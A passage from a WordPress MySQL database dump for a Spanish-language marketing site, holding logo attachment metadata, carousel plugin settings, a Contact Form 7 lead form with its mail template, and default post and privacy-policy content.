"height\";i:65;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2274;}}'),(572,81,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-153x65\";a:6:{s:4:\"path\";s:101:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/molinos-victoria-2-153x65.png\";s:4:\"file\";s:29:\"molinos-victoria-2-153x65.png\";s:5:\"width\";i:153;s:6:\"height\";i:65;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8031;}}'),(573,79,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-194x83\";a:6:{s:4:\"path\";s:102:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/molinos-rio-plata-2-194x83.png\";s:4:\"file\";s:30:\"molinos-rio-plata-2-194x83.png\";s:5:\"width\";i:194;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4160;}}'),(574,77,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-147x63\";a:6:{s:4:\"path\";s:93:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/metrogas-2-147x63.png\";s:4:\"file\";s:21:\"metrogas-2-147x63.png\";s:5:\"width\";i:147;s:6:\"height\";i:63;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4606;}}'),(575,75,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-84x36\";a:6:{s:4:\"path\";s:92:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/megatone-2-84x36.png\";s:4:\"file\";s:20:\"megatone-2-84x36.png\";s:5:\"width\";i:84;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2405;}}'),(576,73,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-121x52\";a:6:{s:4:\"path\";s:91:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/medife-2-121x52.png\";s:4:\"file\";s:19:\"medife-2-121x52.png\";s:5:\"width\";i:121;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5319;}}'),(577,71,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-140x60\";a:6:{s:4:\"path\";s:90:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/makro-2-140x60.png\";s:4:\"file\";s:18:\"makro-2-140x60.png\";s:5:\"width\";i:140;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4223;}}'),(578,69,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-100x43\";a:6:{s:4:\"path\";s:90:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/macro-2-100x43.png\";s:4:\"file\";s:18:\"macro-2-100x43.png\";s:5:\"width\";i:100;s:6:\"height\";i:43;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3093;}}'),(579,67,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-163x70\";a:6:{s:4:\"path\";s:102:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Logo-Recupero-png-2-163x70.png\";s:4:\"file\";s:30:\"Logo-Recupero-png-2-163x70.png\";s:5:\"width\";i:163;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10502;}}'),(580,65,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-49x21\";a:6:{s:4:\"path\";s:95:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/logo-geller-2-49x21.png\";s:4:\"file\";s:23:\"logo-geller-2-49x21.png\";s:5:\"width\";i:49;s:6:\"height\";i:21;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:937;}}'),(581,63,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-121x52\";a:6:{s:4:\"path\";s:96:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/logo-espasa-2-121x52.png\";s:4:\"file\";s:24:\"logo-espasa-2-121x52.png\";s:5:\"width\";i:121;s:6:\"height\";i:52;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5209;}}'),(582,61,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-93x40\";a:6:{s:4:\"path\";s:109:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Logo_Oficial_Banco_Comafi-2-93x40.png\";s:4:\"file\";s:37:\"Logo_Oficial_Banco_Comafi-2-93x40.png\";s:5:\"width\";i:93;s:6:\"height\";i:40;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2871;}}'),(583,59,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-95x41\";a:6:{s:4:\"path\";s:101:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/logo_horizontal_4-2-95x41.png\";s:4:\"file\";s:29:\"logo_horizontal_4-2-95x41.png\";s:5:\"width\";i:95;s:6:\"height\";i:41;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3948;}}'),(584,57,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-46x20\";a:6:{s:4:\"path\";s:88:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/logo-3-46x20.png\";s:4:\"file\";s:16:\"logo-3-46x20.png\";s:5:\"width\";i:46;s:6:\"height\";i:20;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:869;}}'),(585,55,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-65x28\";a:6:{s:4:\"path\";s:88:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/logo-1-65x28.png\";s:4:\"file\";s:16:\"logo-1-65x28.png\";s:5:\"width\";i:65;s:6:\"height\";i:28;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:790;}}'),(586,53,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-107x46\";a:6:{s:4:\"path\";s:103:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/La-Segunda-Seguros-2-107x46.png\";s:4:\"file\";s:31:\"La-Segunda-Seguros-2-107x46.png\";s:5:\"width\";i:107;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6067;}}'),(587,51,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-149x64\";a:6:{s:4:\"path\";s:94:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/ICBC_logo-2-149x64.png\";s:4:\"file\";s:22:\"ICBC_logo-2-149x64.png\";s:5:\"width\";i:149;s:6:\"height\";i:64;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4576;}}'),(588,49,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-178x76\";a:6:{s:4:\"path\";s:88:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/HFA-2-178x76.png\";s:4:\"file\";s:16:\"HFA-2-178x76.png\";s:5:\"width\";i:178;s:6:\"height\";i:76;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3496;}}'),(589,47,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-200x85\";a:6:{s:4:\"path\";s:99:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/galeno-seguros-2-200x85.png\";s:4:\"file\";s:27:\"galeno-seguros-2-200x85.png\";s:5:\"width\";i:200;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10390;}}'),(590,45,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-70x30\";a:6:{s:4:\"path\";s:91:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/fravega-2-70x30.png\";s:4:\"file\";s:19:\"fravega-2-70x30.png\";s:5:\"width\";i:70;s:6:\"height\";i:30;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1069;}}'),(591,43,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-165x71\";a:6:{s:4:\"path\";s:89:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Ford-2-165x71.png\";s:4:\"file\";s:17:\"Ford-2-165x71.png\";s:5:\"width\";i:165;s:6:\"height\";i:71;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12880;}}'),(592,41,'_wp_attachment_backup_sizes','a:1:{s:13:\"resized-72x31\";a:6:{s:4:\"path\";s:111:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/federacion-patronal-seguros-2-72x31.png\";s:4:\"file\";s:39:\"federacion-patronal-seguros-2-72x31.png\";s:5:\"width\";i:72;s:6:\"height\";i:31;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1228;}}'),(593,37,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-200x85\";a:6:{s:4:\"path\";s:96:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/experta-art-2-200x85.png\";s:4:\"file\";s:24:\"experta-art-2-200x85.png\";s:5:\"width\";i:200;s:6:\"height\";i:85;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8027;}}'),(594,35,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-105x45\";a:6:{s:4:\"path\";s:91:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/edesur-2-105x45.png\";s:4:\"file\";s:19:\"edesur-2-105x45.png\";s:5:\"width\";i:105;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3468;}}'),(595,33,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-168x72\";a:6:{s:4:\"path\";s:93:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/download-2-168x72.png\";s:4:\"file\";s:21:\"download-2-168x72.png\";s:5:\"width\";i:168;s:6:\"height\";i:72;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2731;}}'),(596,31,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-196x84\";a:6:{s:4:\"path\";s:117:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/d062f77a8c15a46b1e84001f610e5021-2-196x84.png\";s:4:\"file\";s:45:\"d062f77a8c15a46b1e84001f610e5021-2-196x84.png\";s:5:\"width\";i:196;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5807;}}'),(597,29,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-182x78\";a:6:{s:4:\"path\";s:92:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/credife-2-182x78.png\";s:4:\"file\";s:20:\"credife-2-182x78.png\";s:5:\"width\";i:182;s:6:\"height\";i:78;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12171;}}'),(598,27,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-159x68\";a:6:{s:4:\"path\";s:99:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/club-la-nacion-2-159x68.png\";s:4:\"file\";s:27:\"club-la-nacion-2-159x68.png\";s:5:\"width\";i:159;s:6:\"height\";i:68;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4790;}}'),(599,25,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-105x45\";a:6:{s:4:\"path\";s:107:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/castellaro-automotores-2-105x45.png\";s:4:\"file\";s:35:\"castellaro-automotores-2-105x45.png\";s:5:\"width\";i:105;s:6:\"height\";i:45;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6906;}}'),(600,23,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-195x83\";a:6:{s:4:\"path\";s:100:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Casino-Santa-Fe-2-195x83.png\";s:4:\"file\";s:28:\"Casino-Santa-Fe-2-195x83.png\";s:5:\"width\";i:195;s:6:\"height\";i:83;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8743;}}'),(601,21,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-154x66\";a:6:{s:4:\"path\";s:96:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/cabify-logo-2-154x66.png\";s:4:\"file\";s:24:\"cabify-logo-2-154x66.png\";s:5:\"width\";i:154;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3061;}}'),(602,19,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-140x60\";a:6:{s:4:\"path\";s:94:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/BBVA-Logo-2-140x60.png\";s:4:\"file\";s:22:\"BBVA-Logo-2-140x60.png\";s:5:\"width\";i:140;s:6:\"height\";i:60;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2808;}}'),(603,17,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-107x46\";a:6:{s:4:\"path\";s:99:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Banco-Galicia1-2-107x46.png\";s:4:\"file\";s:27:\"Banco-Galicia1-2-107x46.png\";s:5:\"width\";i:107;s:6:\"height\";i:46;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4221;}}'),(604,15,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-161x69\";a:6:{s:4:\"path\";s:102:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Banco_Hipotecario-2-161x69.png\";s:4:\"file\";s:30:\"Banco_Hipotecario-2-161x69.png\";s:5:\"width\";i:161;s:6:\"height\";i:69;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5747;}}'),(605,13,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-114x49\";a:6:{s:4:\"path\";s:99:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Banco-Columbia-2-114x49.png\";s:4:\"file\";s:27:\"Banco-Columbia-2-114x49.png\";s:5:\"width\";i:114;s:6:\"height\";i:49;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5860;}}'),(606,11,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-197x84\";a:6:{s:4:\"path\";s:102:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/Axion_energy_logo-2-197x84.png\";s:4:\"file\";s:30:\"Axion_energy_logo-2-197x84.png\";s:5:\"width\";i:197;s:6:\"height\";i:84;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:13162;}}'),(607,9,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-112x48\";a:6:{s:4:\"path\";s:86:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/1-2-112x48.png\";s:4:\"file\";s:14:\"1-2-112x48.png\";s:5:\"width\";i:112;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3179;}}'),(608,6,'_wp_attachment_backup_sizes','a:1:{s:14:\"resized-109x47\";a:6:{s:4:\"path\";s:98:\"/home/mktinsiders/public_html/landing2022/wp/wp-content/uploads/2022/09/logo-naranjax-2-109x47.png\";s:4:\"file\";s:26:\"logo-naranjax-2-109x47.png\";s:5:\"width\";i:109;s:6:\"height\";i:47;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3826;}}'),(609,149,'_slide_type','image-carousel'),(610,149,'_carousel_slider_version','2.1.0'),(611,149,'_edit_lock','1664287513:1'),(612,149,'_edit_last','1'),(613,149,'_image_size','full'),(614,149,'_margin_right','10'),(615,149,'_stage_padding','0'),(616,149,'_lazy_load_image','off'),(617,149,'_infinity_loop','on'),(618,149,'_auto_width','off'),(619,149,'_nav_button','on'),(620,149,'_slide_by','1'),(621,149,'_arrow_position','outside'),(622,149,'_arrow_size','48'),(623,149,'_dot_nav','off'),(624,149,'_bullet_position','center'),(625,149,'_bullet_size','10'),(626,149,'_bullet_shape','circle'),(627,149,'_autoplay','on'),(628,149,'_autoplay_pause','on'),(629,149,'_autoplay_timeout','5000'),(630,149,'_autoplay_speed','500'),(631,149,'_nav_color','#f1f1f1'),(632,149,'_nav_active_color','#00d1b2'),(633,149,'_items','5'),(634,149,'_items_desktop','5'),(635,149,'_items_small_desktop','3'),(636,149,'_items_portrait_tablet','2'),(637,149,'_items_small_portrait_tablet','2'),(638,149,'_items_portrait_mobile','1'),(639,149,'_wpdh_image_ids','99,97,95,93,91,89,87,85,83,81,79,77,75,73,71,69,67,65,63,61,59,57,55,53,51,49,47,45,43,41,37,35,33,31,29,27,25,23,21,19,17,15,13,11,9,6'),(640,149,'_shuffle_images','off'),(641,149,'_image_lightbox','off'),(642,149,'_show_attachment_title','off'),(643,149,'_show_attachment_caption','off'),(644,149,'_image_target','_self'),(645,150,'_form','<div class=\"container\">\n<div class=\"col-md-4 fill-cont\">\n<label> DNI*\n[text* dni class:form-control] </label>\n</div>\n<div class=\"col-md-4 fill-cont\">\n<label> Nombre y Apellido*\n[text* nomape class:form-control] </label>\n</div>\n<div class=\"col-md-4 fill-cont\">\n<label> Nombre de empresa*\n[text* empresa class:form-control] </label>\n</div>\n<div class=\"col-md-4 fill-cont\">\n<label> CUIT*\n[text* cuit class:form-control] </label>\n</div>\n<div class=\"col-md-4 fill-cont\">\n<label> Cargo*\n[select* cargo class:form-control \"Socio Gerente\" \"Presidente\" \"Encargado de marketing\" \"Encargado\" \"Responsable\" \"Administrativo\" \"Titular\" \"Empleado\" \"Recursos humanos\" \"Departamento IT\"]</label>\n</div>\n<div class=\"col-md-4 fill-cont\">\n<label> E-mail*\n[email* email class:form-control]</label>\n</div>\n<div class=\"col-md-4 fill-cont\">\n<label> Teléfono*\n[text* telefono class:form-control]</label>\n</div>\n<div class=\"col-md-4 fill-cont\">\n<label> Módulo de interés*\n[select* interes class:form-control \"Enriquecimiento de datos\" \"Segmentación y armado de bases\" \"Email marketing\" \"DB de email váilidos\" \"Smartleads\" \"Inteligencia artificial\" \"Modelo de score crediticio\" \"Inteligencia comercial\" \"Reportes crediticios\"]\n</div>\n<div class=\"col-md-4 fill-cont\">\n[acceptance acceptance-947] ACEPTO LA POLÍTICA DE PRIVACIDAD Y TÉRMINOS Y CONDICIONES [/acceptance]\n</div>\n<div class=\"col-md-12 fill-cont\">\n[submit \"Enviar\"]\n</div>\n</div>'),(646,150,'_mail','a:9:{s:6:\"active\";b:1;s:7:\"subject\";s:17:\"Consulta vía web\";s:6:\"sender\";s:41:\"[_site_title] <wordpress@mktinsiders.com>\";s:9:\"recipient\";s:24:\"contacto@mktinsiders.com\";s:4:\"body\";s:386:\"<strong>DNI:</strong> [dni]\n<strong>Nombre y Apellido:</strong> [nomape] \n<strong>Empresa:</strong> [empresa]\n<strong>CUIT:</strong> [cuit]\n<strong>Cargo:</strong> [cargo]\n<strong>E-mail:</strong> [email]\n<strong>Teléfono:</strong> [telefono]\n<strong>Módulo de Interés:</strong> [interes]\n\n-- \nEste mensaje se ha enviado desde un formulario de contacto en [_site_title] ([_site_url])\";s:18:\"additional_headers\";s:17:\"Reply-To: [email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:1;s:13:\"exclude_blank\";b:0;}'),(647,150,'_mail_2','a:9:{s:6:\"active\";b:0;s:7:\"subject\";s:32:\"[_site_title] «[your-subject]»\";s:6:\"sender\";s:41:\"[_site_title] <wordpress@mktinsiders.com>\";s:9:\"recipient\";s:12:\"[your-email]\";s:4:\"body\";s:129:\"Cuerpo del mensaje:\n[your-message]\n\n-- \nEste mensaje se ha enviado desde un formulario de contacto en [_site_title] ([_site_url])\";s:18:\"additional_headers\";s:29:\"Reply-To: [_site_admin_email]\";s:11:\"attachments\";s:0:\"\";s:8:\"use_html\";b:0;s:13:\"exclude_blank\";b:0;}'),(648,150,'_messages','a:22:{s:12:\"mail_sent_ok\";s:64:\"Gracias por completar el formulario, tu mensaje ha sido enviado.\";s:12:\"mail_sent_ng\";s:94:\"Ha ocurrido un error al intentar enviar tu mensaje. Por favor, inténtalo de nuevo más tarde.\";s:16:\"validation_error\";s:79:\"Uno o más campos tienen un error. Por favor, revísalos e inténtalo de nuevo.\";s:4:\"spam\";s:94:\"Ha ocurrido un error al intentar enviar tu mensaje. Por favor, inténtalo de nuevo más tarde.\";s:12:\"accept_terms\";s:69:\"Debes aceptar los términos y condiciones antes de enviar tu mensaje.\";s:16:\"invalid_required\";s:30:\"Por favor, rellena este campo.\";s:16:\"invalid_too_long\";s:45:\"Este campo tiene una entrada demasiado larga.\";s:17:\"invalid_too_short\";s:45:\"Este campo tiene una entrada demasiado corta.\";s:13:\"upload_failed\";s:53:\"Ha ocurrido un error desconocido al subir el archivo.\";s:24:\"upload_file_type_invalid\";s:52:\"No tienes permisos para subir archivos de este tipo.\";s:21:\"upload_file_too_large\";s:38:\"El archivo subido es demasiado grande.\";s:23:\"upload_failed_php_error\";s:41:\"Ha ocurrido un error al subir el archivo.\";s:12:\"invalid_date\";s:57:\"Por favor, introduce una fecha con el formato YYYY-MM-DD.\";s:14:\"date_too_early\";s:46:\"Este campo tiene una fecha demasiado temprana.\";s:13:\"date_too_late\";s:45:\"Este campo tiene una fecha demasiado tardía.\";s:14:\"invalid_number\";s:32:\"Por favor, introduce un número.\";s:16:\"number_too_small\";s:47:\"Este campo tiene un número demasiado pequeño.\";s:16:\"number_too_large\";s:45:\"Este campo tiene un número demasiado grande.\";s:23:\"quiz_answer_not_correct\";s:44:\"La respuesta al cuestionario no es correcta.\";s:13:\"invalid_email\";s:59:\"Por favor, introduce una dirección de correo electrónico.\";s:11:\"invalid_url\";s:29:\"Por favor, introduce una URL.\";s:11:\"invalid_tel\";s:45:\"Por favor, introduce un número de teléfono.\";}'),(649,150,'_additional_settings',''),(650,150,'_locale','es_ES');
/*!40000 ALTER TABLE `wp_postmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_posts`
--

DROP TABLE IF EXISTS `wp_posts`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_posts` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `post_author` bigint(20) unsigned NOT NULL DEFAULT 0,
  `post_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_date_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content` longtext NOT NULL,
  `post_title` text NOT NULL,
  `post_excerpt` text NOT NULL,
  `post_status` varchar(20) NOT NULL DEFAULT 'publish',
  `comment_status` varchar(20) NOT NULL DEFAULT 'open',
  `ping_status` varchar(20) NOT NULL DEFAULT 'open',
  `post_password` varchar(255) NOT NULL DEFAULT '',
  `post_name` varchar(200) NOT NULL DEFAULT '',
  `to_ping` text NOT NULL,
  `pinged` text NOT NULL,
  `post_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `post_content_filtered` longtext NOT NULL,
  `post_parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `guid` varchar(255) NOT NULL DEFAULT '',
  `menu_order` int(11) NOT NULL DEFAULT 0,
  `post_type` varchar(20) NOT NULL DEFAULT 'post',
  `post_mime_type` varchar(100) NOT NULL DEFAULT '',
  `comment_count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`ID`),
  KEY `post_name` (`post_name`(191)),
  KEY `type_status_date` (`post_type`,`post_status`,`post_date`,`ID`),
  KEY `post_parent` (`post_parent`),
  KEY `post_author` (`post_author`)
) ENGINE=InnoDB AUTO_INCREMENT=151 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_posts`
--

LOCK TABLES `wp_posts` WRITE;
/*!40000 ALTER TABLE `wp_posts` DISABLE KEYS */;
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES (1,1,'2022-09-26 17:16:52','2022-09-26 17:16:52','<!-- wp:paragraph -->\n<p>Bienvenido a WordPress. Esta es tu primera entrada. Edítala o bórrala, ¡luego empieza a escribir!</p>\n<!-- /wp:paragraph -->','¡Hola, mundo!','','publish','open','open','','hola-mundo','','','2022-09-26 17:16:52','2022-09-26 17:16:52','',0,'https://mktinsiders.com/landing2022/wp/?p=1',0,'post','',1),(2,1,'2022-09-26 17:16:52','2022-09-26 17:16:52','<!-- wp:paragraph -->\n<p>Esta es una página de ejemplo. Es diferente a una entrada del blog porque permanecerá en un solo lugar y aparecerá en la navegación de tu sitio (en la mayoría de los temas). La mayoría de las personas comienzan con una página «Acerca de» que les presenta a los visitantes potenciales del sitio. Podrías decir algo así:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>¡Bienvenido! Soy camarero de día, aspirante a actor de noche y esta es mi web. Vivo en Mairena del Alcor, tengo un perro que se llama Firulais y me gusta el rebujito. (Y las tardes largas con café).</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>…o algo así:</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:quote -->\n<blockquote class=\"wp-block-quote\"><p>La empresa «Mariscos Recio» fue fundada por Antonio Recio Mata. Empezó siendo una pequeña empresa que suministraba marisco a hoteles y restaurantes, pero poco a poco se ha ido transformando en un gran imperio. Mariscos Recio, el mar al mejor precio.</p></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:paragraph -->\n<p>Como nuevo usuario de WordPress, deberías ir a <a href=\"https://mktinsiders.com/landing2022/wp/wp-admin/\">tu escritorio</a> para borrar esta página y crear nuevas páginas para tu contenido. ¡Pásalo bien!</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:shortcode -->\n[logocarousel id=\"7\"]\n<!-- /wp:shortcode -->','Página de ejemplo','','publish','closed','open','','pagina-ejemplo','','','2022-09-26 17:29:07','2022-09-26 17:29:07','',0,'https://mktinsiders.com/landing2022/wp/?page_id=2',0,'page','',0),(3,1,'2022-09-26 17:16:52','2022-09-26 17:16:52','<!-- wp:heading --><h2>Quiénes somos</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>La dirección de nuestra web es: https://mktinsiders.com/landing2022/wp.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Comentarios</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Cuando los visitantes dejan comentarios en la web, recopilamos los datos que se muestran en el formulario de comentarios, así como la dirección IP del visitante y la cadena de agentes de usuario del navegador para ayudar a la detección de spam.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>Una cadena anónima creada a partir de tu dirección de correo electrónico (también llamada hash) puede ser proporcionada al servicio de Gravatar para ver si la estás usando. La política de privacidad del servicio Gravatar está disponible aquí: https://automattic.com/privacy/. Después de la aprobación de tu comentario, la imagen de tu perfil es visible para el público en el contexto de tu comentario.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Medios</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Si subes imágenes a la web, deberías evitar subir imágenes con datos de ubicación (GPS EXIF) incluidos. Los visitantes de la web pueden descargar y extraer cualquier dato de ubicación de las imágenes de la web.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Cookies</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Si dejas un comentario en nuestro sitio puedes elegir guardar tu nombre, dirección de correo electrónico y web en cookies. Esto es para tu comodidad, para que no tengas que volver a rellenar tus datos cuando dejes otro comentario. Estas cookies tendrán una duración de un año.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>Si tienes una cuenta y te conectas a este sitio, instalaremos una cookie temporal para determinar si tu navegador acepta cookies. Esta cookie no contiene datos personales y se elimina al cerrar el navegador.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>Cuando accedas, también instalaremos varias cookies para guardar tu información de acceso y tus opciones de visualización de pantalla. Las cookies de acceso duran dos días, y las cookies de opciones de pantalla duran un año. Si seleccionas «Recuérdarme», tu acceso perdurará durante dos semanas. Si sales de tu cuenta, las cookies de acceso se eliminarán.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>Si editas o publicas un artículo se guardará una cookie adicional en tu navegador. Esta cookie no incluye datos personales y simplemente indica el ID del artículo que acabas de editar. Caduca después de 1 día.</p><!-- /wp:paragraph --><!-- wp:heading --><h2>Contenido incrustado de otros sitios web</h2><!-- /wp:heading --><!-- wp:paragraph --><p><strong class=\"privacy-policy-tutorial\">Texto sugerido: </strong>Los artículos de este sitio pueden incluir contenido incrustado (por ejemplo, vídeos, imágenes, artículos, etc.). El contenido incrustado de otras webs se comporta exactamente de la misma manera que si el visitante hubiera visitado la otra web.</p><!-- /wp:paragraph --><!-- wp:paragraph --><p>Estas web pueden recopilar datos sobre ti, utilizar cookies, incrustar un 